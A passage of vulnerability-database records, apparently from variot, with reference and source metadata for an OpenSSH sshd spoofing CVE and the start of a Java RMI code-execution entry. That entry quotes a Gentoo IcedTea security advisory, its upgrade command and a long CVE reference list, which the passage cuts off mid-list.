"http://www-01.ibm.com/support/docview.wss?uid=isg3t1024669" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1021524" }, { "trust": 0.3, "url": "http://www.pexip.com/sites/pexip/files/pexip_security_bulletin_2015-08-21.pdf" }, { "trust": 0.3, "url": "https://kc.mcafee.com/resources/sites/mcafee/content/live/product_documentation/27000/pd27128/en_us/meg_7_6_406_3402_103_release_notes_en_us.pdf" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1009325" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21987978" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21988706" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21990741" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21992927" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-6564" }, { "trust": 0.2, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2015-6564" }, { "trust": 0.2, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.2, "url": "https://access.redhat.com/security/team/key/" }, { "trust": 0.2, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.2, "url": "https://access.redhat.com/security/updates/classification/#moderate" }, { "trust": 0.2, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5352" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5600" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/20.html" }, { "trust": 0.1, "url": "https://access.redhat.com/errata/rhsa-2015:2088" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-349-21" }, { "trust": 0.1, "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=41651" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5925" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5936" }, { "trust": 0.1, "url": "https://support.apple.com/kb/ht201222" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-6836" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0235" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5943" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5924" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5945" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-6834" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5935" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5944" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5942" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3565" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-6837" }, { "trust": 0.1, "url": "http://www.apple.com/support/downloads/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5940" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5927" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5933" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5939" }, { "trust": 0.1, "url": "https://support.apple.com/kb/ht205377" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5934" }, { "trust": 0.1, "url": "https://www.apple.com/support/security/pgp/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-6835" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-6838" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-6151" }, { "trust": 0.1, "url": "http://gpgtools.org" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5938" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-6974" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0273" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5926" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5937" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5932" }, { "trust": 0.1, "url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/6.8_release_notes/index.html" }, { "trust": 0.1, "url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/6.8_technical_notes/index.html" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-5352" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-1908" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1908" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2015-2088.html" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-5600" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-5352" }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-sa/2.5" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-6565" }, { "trust": 0.1, "url": "https://bugs.gentoo.org." }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-6565" }, { "trust": 0.1, "url": "https://security.gentoo.org/" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-5600" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-6563" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-6564" } ], "sources": [ { "db": "VULHUB", "id": "VHN-84524" }, { "db": "VULMON", "id": "CVE-2015-6563" }, { "db": "BID", "id": "76317" }, { "db": "JVNDB", "id": "JVNDB-2015-004403" }, { "db": "PACKETSTORM", "id": "134055" }, { "db": "PACKETSTORM", "id": "136959" }, { "db": "PACKETSTORM", "id": "134475" }, { "db": "PACKETSTORM", "id": "135009" }, { "db": "NVD", "id": "CVE-2015-6563" }, { "db": "CNNVD", "id": "CNNVD-201508-115" }, { "db": "CNNVD", "id": "CNNVD-201508-504" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULHUB", "id": "VHN-84524" }, { "db": "VULMON", "id": "CVE-2015-6563" }, { "db": "BID", "id": "76317" }, { "db": "JVNDB", "id": "JVNDB-2015-004403" }, { "db": "PACKETSTORM", "id": "134055" }, { "db": "PACKETSTORM", "id": "136959" }, { "db": "PACKETSTORM", "id": "134475" }, { "db": "PACKETSTORM", "id": "135009" }, { "db": "NVD", "id": "CVE-2015-6563" }, { "db": "CNNVD", "id": "CNNVD-201508-115" }, { "db": "CNNVD", "id": "CNNVD-201508-504" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2015-08-24T00:00:00", "db": "VULHUB", "id": "VHN-84524" }, { "date": "2015-08-24T00:00:00", "db": "VULMON", "id": "CVE-2015-6563" }, { "date": "2015-08-12T00:00:00", "db": "BID", "id": "76317" }, { "date": "2015-08-26T00:00:00", "db": "JVNDB", "id": "JVNDB-2015-004403" }, { "date": "2015-10-21T19:32:22", "db": "PACKETSTORM", "id": "134055" }, { "date": "2016-05-11T13:59:48", "db": "PACKETSTORM", "id": "136959" }, { "date": "2015-11-20T00:47:23", "db": "PACKETSTORM", "id": "134475" }, { "date": "2015-12-21T23:23:00", "db": "PACKETSTORM", "id": "135009" }, { "date": "2015-08-24T01:59:00.127000", "db": "NVD", "id": "CVE-2015-6563" }, { "date": "2015-08-13T00:00:00", "db": "CNNVD", "id": "CNNVD-201508-115" }, { "date": "2015-08-25T00:00:00", "db": "CNNVD", "id": "CNNVD-201508-504" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2022-12-13T00:00:00", "db": "VULHUB", "id": "VHN-84524" }, { "date": "2022-12-13T00:00:00", "db": "VULMON", "id": "CVE-2015-6563" }, { "date": "2017-12-19T22:37:00", "db": "BID", "id": "76317" }, { "date": "2015-10-27T00:00:00", "db": "JVNDB", "id": "JVNDB-2015-004403" }, { "date": "2022-12-13T12:15:17.460000", "db": "NVD", "id": "CVE-2015-6563" }, { "date": "2015-08-13T00:00:00", "db": "CNNVD", "id": "CNNVD-201508-115" }, { "date": "2022-12-14T00:00:00", "db": "CNNVD", "id": "CNNVD-201508-504" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201508-115" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "OpenBSD Run on other platforms OpenSSH of sshd Vulnerabilities that allow spoofing attacks in the monitor component", "sources": [ { "db": "JVNDB", "id": "JVNDB-2015-004403" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "code injection", "sources": [ { "db": "CNNVD", "id": "CNNVD-201508-115" } ], "trust": 0.6 } }
var-201304-0300
Vulnerability from variot
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 17 and earlier, 6 Update 43 and earlier, and 5.0 Update 41 and earlier; and OpenJDK 6 and 7; allows remote attackers to affect confidentiality, integrity, and availability via vectors related to RMI. NOTE: the previous information is from the April 2013 CPU. Oracle has not commented on claims from another vendor that this issue is related to the default java.rmi.server.useCodebaseOnly setting of false, which allows remote attackers to perform "dynamic class downloading" and execute arbitrary code. Oracle Java SE is prone to a remote code execution vulnerability in Java Runtime Environment. An attacker can exploit this issue to execute arbitrary code in the context of the current user. This vulnerability affects the following supported versions: 7 Update 17 , 6 Update 43 , 5.0 Update 41. In a typical operating environment, these are of low security risk as the runtime is not used on untrusted applets. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201406-32
http://security.gentoo.org/
Severity: High Title: IcedTea JDK: Multiple vulnerabilities Date: June 29, 2014 Bugs: #312297, #330205, #340819, #346799, #352035, #353418, #354231, #355127, #370787, #387637, #404095, #421031, #429522, #433389, #438750, #442478, #457206, #458410, #461714, #466822, #477210, #489570, #508270 ID: 201406-32
Synopsis
Multiple vulnerabilities have been found in the IcedTea JDK, the worst of which could lead to arbitrary code execution.
Background
IcedTea is a distribution of the Java OpenJDK source code built with free build tools.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-java/icedtea-bin < 6.1.13.3 >= 6.1.13.3
Description
Multiple vulnerabilities have been discovered in the IcedTea JDK. Please review the CVE identifiers referenced below for details.
Impact
A remote attacker could possibly execute arbitrary code with the privileges of the process, cause a Denial of Service condition, obtain sensitive information, bypass intended security policies, or have other unspecified impact.
Workaround
There is no known workaround at this time.
Resolution
All IcedTea JDK users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=dev-java/icedtea-bin-6.1.13.3"
References
[ 1 ] CVE-2009-3555 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3555 [ 2 ] CVE-2010-2548 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2548 [ 3 ] CVE-2010-2783 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2783 [ 4 ] CVE-2010-3541 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3541 [ 5 ] CVE-2010-3548 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3548 [ 6 ] CVE-2010-3549 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3549 [ 7 ] CVE-2010-3551 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3551 [ 8 ] CVE-2010-3553 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3553 [ 9 ] CVE-2010-3554 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3554 [ 10 ] CVE-2010-3557 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3557 [ 11 ] CVE-2010-3561 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3561 [ 12 ] CVE-2010-3562 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3562 [ 13 ] CVE-2010-3564 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3564 [ 14 ] CVE-2010-3565 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3565 [ 15 ] CVE-2010-3566 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3566 [ 16 ] CVE-2010-3567 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3567 [ 17 ] CVE-2010-3568 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3568 [ 18 ] CVE-2010-3569 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3569 [ 19 ] CVE-2010-3573 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3573 [ 20 ] CVE-2010-3574 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3574 [ 21 ] CVE-2010-3860 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3860 [ 22 ] CVE-2010-4351 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4351 [ 23 ] CVE-2010-4448 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4448 [ 24 ] CVE-2010-4450 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4450 [ 25 ] CVE-2010-4465 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4465 [ 26 ] CVE-2010-4467 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4467 [ 27 ] CVE-2010-4469 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4469 [ 28 ] CVE-2010-4470 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4470 [ 29 ] CVE-2010-4471 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4471 [ 30 ] CVE-2010-4472 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4472 [ 31 ] CVE-2010-4476 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4476 [ 32 ] CVE-2011-0025 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0025 [ 33 ] CVE-2011-0706 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0706 [ 34 ] CVE-2011-0815 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0815 [ 35 ] CVE-2011-0822 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0822 [ 36 ] CVE-2011-0862 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0862 [ 37 ] CVE-2011-0864 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0864 [ 38 ] CVE-2011-0865 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0865 [ 39 ] CVE-2011-0868 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0868 [ 40 ] CVE-2011-0869 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0869 [ 41 ] CVE-2011-0870 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0870 [ 42 ] CVE-2011-0871 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0871 [ 43 ] CVE-2011-0872 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0872 [ 44 ] CVE-2011-3389 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3389 [ 45 ] CVE-2011-3521 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3521 [ 46 ] CVE-2011-3544 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3544 [ 47 ] CVE-2011-3547 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3547 [ 48 ] CVE-2011-3548 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3548 [ 49 ] CVE-2011-3551 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3551 [ 50 ] CVE-2011-3552 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3552 [ 51 ] CVE-2011-3553 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3553 [ 52 ] CVE-2011-3554 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3554 [ 53 ] CVE-2011-3556 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3556 [ 54 ] CVE-2011-3557 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3557 [ 55 ] CVE-2011-3558 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3558 [ 56 ] CVE-2011-3560 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3560 [ 57 ] CVE-2011-3563 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3563 [ 58 ] CVE-2011-3571 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3571 [ 59 ] CVE-2011-5035 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-5035 [ 60 ] CVE-2012-0497 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0497 [ 61 ] CVE-2012-0501 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0501 [ 62 ] CVE-2012-0502 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0502 [ 63 ] CVE-2012-0503 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0503 [ 64 ] CVE-2012-0505 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0505 [ 65 ] CVE-2012-0506 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0506 [ 66 ] CVE-2012-0547 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0547 [ 67 ] CVE-2012-1711 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1711 [ 68 ] CVE-2012-1713 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1713 [ 69 ] CVE-2012-1716 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1716 [ 70 ] CVE-2012-1717 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1717 [ 71 ] CVE-2012-1718 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1718 [ 72 ] CVE-2012-1719 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1719 [ 73 ] CVE-2012-1723 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1723 [ 74 ] CVE-2012-1724 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1724 [ 75 ] CVE-2012-1725 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1725 [ 76 ] CVE-2012-1726 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1726 [ 77 ] CVE-2012-3216 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3216 [ 78 ] CVE-2012-3422 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3422 [ 79 ] CVE-2012-3423 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3423 [ 80 ] CVE-2012-4416 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4416 [ 81 ] CVE-2012-4540 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4540 [ 82 ] CVE-2012-5068 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5068 [ 83 ] CVE-2012-5069 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5069 [ 84 ] CVE-2012-5070 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5070 [ 85 ] CVE-2012-5071 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5071 [ 86 ] CVE-2012-5072 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5072 [ 87 ] CVE-2012-5073 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5073 [ 88 ] CVE-2012-5074 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5074 [ 89 ] CVE-2012-5075 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5075 [ 90 ] CVE-2012-5076 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5076 [ 91 ] CVE-2012-5077 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5077 [ 92 ] CVE-2012-5081 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5081 [ 93 ] CVE-2012-5084 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5084 [ 94 ] CVE-2012-5085 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5085 [ 95 ] CVE-2012-5086 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5086 [ 96 ] CVE-2012-5087 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5087 [ 97 ] CVE-2012-5089 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5089 [ 98 ] CVE-2012-5979 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5979 [ 99 ] CVE-2013-0169 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0169 [ 100 ] CVE-2013-0401 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0401 [ 101 ] CVE-2013-0424 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0424 [ 102 ] CVE-2013-0425 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0425 [ 103 ] CVE-2013-0426 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0426 [ 104 ] CVE-2013-0427 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0427 [ 105 ] CVE-2013-0428 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0428 [ 106 ] CVE-2013-0429 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0429 [ 107 ] CVE-2013-0431 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0431 [ 108 ] CVE-2013-0432 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0432 [ 109 ] CVE-2013-0433 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0433 [ 110 ] CVE-2013-0434 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0434 [ 111 ] CVE-2013-0435 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0435 [ 112 ] CVE-2013-0440 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0440 [ 113 ] CVE-2013-0441 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0441 [ 114 ] CVE-2013-0442 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0442 [ 115 ] CVE-2013-0443 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0443 [ 116 ] CVE-2013-0444 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0444 [ 117 ] CVE-2013-0450 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0450 [ 118 ] CVE-2013-0809 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0809 [ 119 ] CVE-2013-1475 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1475 [ 120 ] CVE-2013-1476 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1476 [ 121 ] CVE-2013-1478 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1478 [ 122 ] CVE-2013-1480 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1480 [ 123 ] CVE-2013-1484 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1484 [ 124 ] CVE-2013-1485 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1485 [ 125 ] CVE-2013-1486 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1486 [ 126 ] CVE-2013-1488 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1488 [ 127 ] CVE-2013-1493 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1493 [ 128 ] CVE-2013-1500 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1500 [ 129 ] CVE-2013-1518 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1518 [ 130 ] CVE-2013-1537 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1537 [ 131 ] CVE-2013-1557 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1557 [ 132 ] CVE-2013-1569 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1569 [ 133 ] CVE-2013-1571 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1571 [ 134 ] CVE-2013-2383 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2383 [ 135 ] CVE-2013-2384 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2384 [ 136 ] CVE-2013-2407 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2407 [ 137 ] CVE-2013-2412 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2412 [ 138 ] CVE-2013-2415 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2415 [ 139 ] CVE-2013-2417 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2417 [ 140 ] CVE-2013-2419 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2419 [ 141 ] CVE-2013-2420 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2420 [ 142 ] CVE-2013-2421 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2421 [ 143 ] CVE-2013-2422 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2422 [ 144 ] CVE-2013-2423 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2423 [ 145 ] CVE-2013-2424 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2424 [ 146 ] CVE-2013-2426 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2426 [ 147 ] CVE-2013-2429 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2429 [ 148 ] CVE-2013-2430 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2430 [ 149 ] CVE-2013-2431 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2431 [ 150 ] CVE-2013-2436 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2436 [ 151 ] CVE-2013-2443 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2443 [ 152 ] CVE-2013-2444 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2444 [ 153 ] CVE-2013-2445 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2445 [ 154 ] CVE-2013-2446 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2446 [ 155 ] CVE-2013-2447 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2447 [ 156 ] CVE-2013-2448 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2448 [ 157 ] CVE-2013-2449 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2449 [ 158 ] CVE-2013-2450 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2450 [ 159 ] CVE-2013-2451 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2451 [ 160 ] CVE-2013-2452 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2452 [ 161 ] CVE-2013-2453 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2453 [ 162 ] CVE-2013-2454 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2454 [ 163 ] CVE-2013-2455 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2455 [ 164 ] CVE-2013-2456 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2456 [ 165 ] CVE-2013-2457 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2457 [ 166 ] CVE-2013-2458 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2458 [ 167 ] CVE-2013-2459 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2459 [ 168 ] CVE-2013-2460 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2460 [ 169 ] CVE-2013-2461 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2461 [ 170 ] CVE-2013-2463 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2463 [ 171 ] CVE-2013-2465 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2465 [ 172 ] CVE-2013-2469 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2469 [ 173 ] CVE-2013-2470 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2470 [ 174 ] CVE-2013-2471 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2471 [ 175 ] CVE-2013-2472 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2472 [ 176 ] CVE-2013-2473 